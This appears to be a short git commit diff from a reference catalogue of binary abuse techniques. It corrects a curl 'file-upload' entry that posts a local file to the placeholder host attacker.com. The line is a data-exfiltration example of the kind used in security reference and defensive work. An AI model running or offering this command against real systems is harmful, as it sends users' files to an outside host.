Fix curl file-upload

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Victorio Scafati 2022-12-16 11:15:44 -03:00 committed by GitHub
parent 2eb95ad20d
commit 40a850064e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -5,7 +5,7 @@ functions:
code: |
URL=http://attacker.com/
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
curl -X POST -d "@$LFILE" $URL
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |